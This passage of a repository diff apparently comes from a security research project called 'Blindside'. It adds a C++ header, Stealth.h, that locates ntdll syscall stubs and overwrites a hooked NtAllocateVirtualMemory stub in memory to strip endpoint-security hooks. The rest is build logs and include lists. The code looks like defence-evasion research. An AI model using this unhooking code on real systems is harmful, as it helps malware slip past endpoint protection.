     193 +typedef BOOL(WINAPI* TypeCreateProcessW)(
     194 + LPCWSTR lpApplicationName,
     195 + LPWSTR lpCommandLine,
     196 + LPSECURITY_ATTRIBUTES lpProcessAttributes,
     197 + LPSECURITY_ATTRIBUTES lpThreadAttributes,
     198 + BOOL bInheritHandles,
     199 + DWORD dwCreationFlags,
     200 + LPVOID lpEnvironment,
     201 + LPCWSTR lpCurrentDirectory,
     202 + LPSTARTUPINFOW lpStartupInfo,
     203 + LPPROCESS_INFORMATION lpProcessInformation
     204 + );
     205 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/Stealth.h
     1 +#include <Windows.h>
     2 +#include <stdio.h>
     3 +#include <stdlib.h>
     4 +#include <string.h>
     5 +#include "Helpers.h"
     6 +
     7 +
     8 +#define DEREF( name )*(UINT_PTR *)(name)
     9 +#define DEREF_64( name )*(DWORD64 *)(name)
     10 +
     11 +//Refer -> https://github.com/paranoidninja/PIC-Get-Privileges/blob/main/addresshunter.h
     12 +
     13 +
     14 +//Following functions are copied from HellsGate : https://github.com/am0nsec/HellsGate/blob/master/HellsGate/main.c
     15 +
     16 +//also: https://github.com/dosxuz/PerunsFart/blob/main/helper.h
     17 +
     18 +BOOL GetImageExportDirectory(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory)
     19 +{
     20 + //Get DOS header
     21 + PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
     22 + if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
     23 + return FALSE;
     24 + }
     25 +
     26 + PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)ntdllBase + pImageDosHeader->e_lfanew);
     27 + if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
     28 + return FALSE;
     29 + }
     30 + // Get the EAT
     31 + *ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)ntdllBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
     32 + return TRUE;
     33 +}
     34 +
     35 +PVOID GetTableEntry(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, CHAR* findfunction)
     36 +{
     37 + PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
     38 + PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
     39 + PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);
     40 + PVOID funcAddress = 0x00;
     41 + for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
     42 + PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
     43 + PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
     44 +
     45 + if (std::strcmp(findfunction, pczFunctionName) == 0)
     46 + {
     47 + WORD cw = 0;
     48 + while (TRUE)
     49 + {
     50 + if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
     51 + {
     52 + return 0x00;
     53 + }
     54 +
     55 + // check if ret, in this case we are also probaly too far
     56 + if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
     57 + {
     58 + return 0x00;
     59 + }
     60 +
     61 + if (*((PBYTE)pFunctionAddress + cw) == 0x4c
     62 + && *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
     63 + && *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
     64 + && *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
     65 + && *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
     66 + && *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
     67 + BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
     68 + BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
     69 + WORD syscall = (high << 8) | low;
     70 + //printf("Function Name : %s", pczFunctionName);
     71 + //printf("Syscall : 0x%x", syscall);
     72 + return pFunctionAddress;
     73 + break;
     74 + }
     75 + cw++;
     76 + }
     77 + }
     78 + }
     79 + return funcAddress;
     80 +}
     81 +
     82 +DWORD ChangePerms(PVOID textBase, DWORD flProtect, SIZE_T size)
     83 +{
     84 + DWORD oldprotect;
     85 + VirtualProtect(textBase, size, flProtect, &oldprotect);
     86 + return oldprotect;
     87 +}
     88 +
     89 +BOOL OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
     90 +{
     91 + PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
     92 + PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
     93 + PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);
     94 +
     95 + for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
     96 + PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
     97 + PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
     98 +
     99 + if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
     100 + {
     101 + PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
     102 + if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
     103 + {
     104 + if (strcmp(pczFunctionName, "NtAllocateVirtualMemory") == 0) {
     105 + printf("[STEALTH] Function Name : %s\n", pczFunctionName);
     106 + printf("[STEALTH] Address of Function: 0x%p\n", funcAddress);
     107 +
     108 + //Change the write permissions of the .text section of the ntdll in memory
     109 + DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);
     110 + if (oldprotect == 0) {
     111 + // Failed to change memory protection, return failure
     112 + return FALSE;
     113 + }
     114 +
     115 + //Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
     116 + if (std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23) == NULL) {
     117 + // Failed to copy memory, return failure
     118 + return FALSE;
     119 + }
     120 +
     121 + //Change back to the old permissions
     122 + if (ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize) == 0) {
     123 + // Failed to change memory protection, return failure
     124 + return FALSE;
     125 + }
     126 + }
     127 + }
     128 + }
     129 + }
     130 +
     131 + // Return success
     132 + return TRUE;
     133 +}
     134 +
     135 +BOOL Execute(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_SECTION_HEADER textsection)
     136 +{
     137 + PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
     138 +
     139 + if (!GetImageExportDirectory(freshntDllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
     140 + printf("Error getting ImageExportDirectory\n");
     141 +
     142 + PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory = NULL;
     143 + if (!GetImageExportDirectory(ntdllBase, &hooked_pImageExportDirectory) || hooked_pImageExportDirectory == NULL)
     144 + printf("Error gettong ImageExportDirectory\n");
     145 +
     146 + BOOL overwrite = OverwriteNtdll(ntdllBase, freshntDllBase, hooked_pImageExportDirectory, pImageExportDirectory, textsection);
     147 + if (overwrite)
     148 + {
     149 + return TRUE;
     150 + }
     151 + return FALSE;
     152 +}
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.exe.recipe
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project>
     3 + <ProjectOutputs>
     4 + <ProjectOutput>
     5 + <FullPath>C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\x64\Debug\Blindside.exe</FullPath>
     6 + </ProjectOutput>
     7 + </ProjectOutputs>
     8 + <ContentFiles />
     9 + <SatelliteDlls />
     10 + <NonRecipeFileRefs />
     11 +</Project>
  • Blindside/x64/Debug/Blindside.ilk
    Binary file.
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.log
     1 + Blindside.cpp
     2 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(160,113): warning C4305: 'argument': truncation from '__int64' to 'DWORD'
     3 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(160,101): warning C4309: 'argument': truncation of constant value
     4 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(262,9): warning C4477: 'printf' : format string '%p' requires an argument of type 'void *', but variadic argument 1 has type 'size_t'
     5 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(271,9): warning C4477: 'printf' : format string '%p' requires an argument of type 'void *', but variadic argument 1 has type 'size_t'
     6 + Blindside.vcxproj -> C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\x64\Debug\Blindside.exe
     7 + 
  • Blindside/x64/Debug/Blindside.obj
    Binary file.
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.tlog/Blindside.lastbuildstate
     1 +PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
     2 +Debug|x64|C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\|
     3 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.tlog/CL.command.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\BLINDSIDE.CPP
     2 +/c /ZI /JMC /nologo /W3 /WX- /diagnostics:column /sdl /Od /D _DEBUG /D _CONSOLE /D _CRT_SECURE_NO_WARNINGS /D _UNICODE /D UNICODE /Gm- /EHsc /RTC1 /MDd /GS /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /permissive- /Fo"X64\DEBUG\\" /Fd"X64\DEBUG\VC143.PDB" /external:W3 /Gd /TP /FC C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\BLINDSIDE.CPP
     3 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.tlog/CL.read.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\BLINDSIDE.CPP
     2 +C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
     3 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\BIN\HOSTX64\X64\1033\CLUI.DLL
     4 +C:\WINDOWS\SYSTEM32\TZRES.DLL
     5 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINDOWS.H
     6 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINAPIFAMILY.H
     7 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINPACKAGEFAMILY.H
     8 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SDKDDKVER.H
     9 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\EXCPT.H
     10 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME.H
     11 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\SAL.H
     12 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CONCURRENCYSAL.H
     13 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VADEFS.H
     14 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STDARG.H
     15 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINDEF.H
     16 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\MINWINDEF.H
     17 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SPECSTRINGS.H
     18 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SPECSTRINGS_STRICT.H
     19 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SPECSTRINGS_UNDEF.H
     20 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\DRIVERSPECS.H
     21 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SDV_DRIVERSPECS.H
     22 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINNT.H
     23 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CTYPE.H
     24 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT.H
     25 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WCTYPE.H
     26 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\KERNELSPECS.H
     27 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\BASETSD.H
     28 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\GUIDDEF.H
     29 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\STRING.H
     30 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_MEMORY.H
     31 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_MEMCPY_S.H
     32 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\ERRNO.H
     33 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_STRING.H
     34 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WSTRING.H
     35 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\PSHPACK4.H
     36 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\POPPACK.H
     37 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\PSHPACK2.H
     38 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\PSHPACK8.H
     39 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\PSHPACK1.H
     40 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\APISET.H
     41 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\KTMTYPES.H
     42 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINBASE.H
     43 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\APISETCCONV.H
     44 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MINWINBASE.H
     45 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\APIQUERY2.H
     46 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROCESSENV.H
     47 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\FILEAPIFROMAPP.H
     48 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\FILEAPI.H
     49 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DEBUGAPI.H
     50 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\UTILAPISET.H
     51 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\HANDLEAPI.H
     52 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\ERRHANDLINGAPI.H
     53 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\FIBERSAPI.H
     54 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\NAMEDPIPEAPI.H
     55 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROFILEAPI.H
     56 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\HEAPAPI.H
     57 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\IOAPISET.H
     58 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SYNCHAPI.H
     59 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\INTERLOCKEDAPI.H
     60 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROCESSTHREADSAPI.H
     61 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SYSINFOAPI.H
     62 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MEMORYAPI.H
     63 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\ENCLAVEAPI.H
     64 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\THREADPOOLLEGACYAPISET.H
     65 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\THREADPOOLAPISET.H
     66 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\JOBAPI.H
     67 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\JOBAPI2.H
     68 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WOW64APISET.H
     69 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\LIBLOADERAPI.H
     70 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SECURITYBASEAPI.H
     71 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\NAMESPACEAPI.H
     72 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SYSTEMTOPOLOGYAPI.H
     73 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROCESSTOPOLOGYAPI.H
     74 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SECURITYAPPCONTAINER.H
     75 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\REALTIMEAPISET.H
     76 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINERROR.H
     77 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\TIMEZONEAPI.H
     78 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINGDI.H
     79 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINUSER.H
     80 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\TVOUT.H
     81 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINNLS.H
     82 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DATETIMEAPI.H
     83 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\STRINGAPISET.H
     84 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINCON.H
     85 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINCONTYPES.H
     86 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\CONSOLEAPI.H
     87 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\CONSOLEAPI2.H
     88 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\CONSOLEAPI3.H
     89 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINVER.H
     90 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\VERRSRC.H
     91 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINREG.H
     92 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\REASON.H
     93 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINNETWK.H
     94 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WNNC.H
     95 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\CDERR.H
     96 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DDE.H
     97 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DDEML.H
     98 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DLGS.H
     99 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\LZEXPAND.H
     100 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMSYSTEM.H
     101 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMSYSCOM.H
     102 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MCIAPI.H
     103 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMISCAPI.H
     104 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMISCAPI2.H
     105 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PLAYSOUNDAPI.H
     106 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMEAPI.H
     107 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\TIMEAPI.H
     108 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\JOYSTICKAPI.H
     109 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\NB30.H
     110 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPC.H
     111 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCDCE.H
     112 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCDCEP.H
     113 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\RPCNSI.H
     114 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCNTERR.H
     115 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCASYNC.H
     116 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SHELLAPI.H
     117 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINPERF.H
     118 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINSOCK.H
     119 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\INADDR.H
     120 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINCRYPT.H
     121 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\BCRYPT.H
     122 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\NCRYPT.H
     123 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DPAPI.H
     124 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINEFS.H
     125 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINSCARD.H
     126 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WTYPES.H
     127 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCNDR.H
     128 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\RPCNSIP.H
     129 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCSAL.H
     130 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WTYPESBASE.H
     131 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINIOCTL.H
     132 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINSMCRD.H
     133 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINSPOOL.H
     134 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PRSHT.H
     135 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OLE2.H
     136 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OBJBASE.H
     137 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\COMBASEAPI.H
     138 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\STDLIB.H
     139 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_MALLOC.H
     140 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_SEARCH.H
     141 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\STDDEF.H
     142 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WSTDLIB.H
     143 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\LIMITS.H
     144 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\UNKNWNBASE.H
     145 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OBJIDLBASE.H
     146 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\CGUID.H
     147 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\COML2API.H
     148 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OBJIDL.H
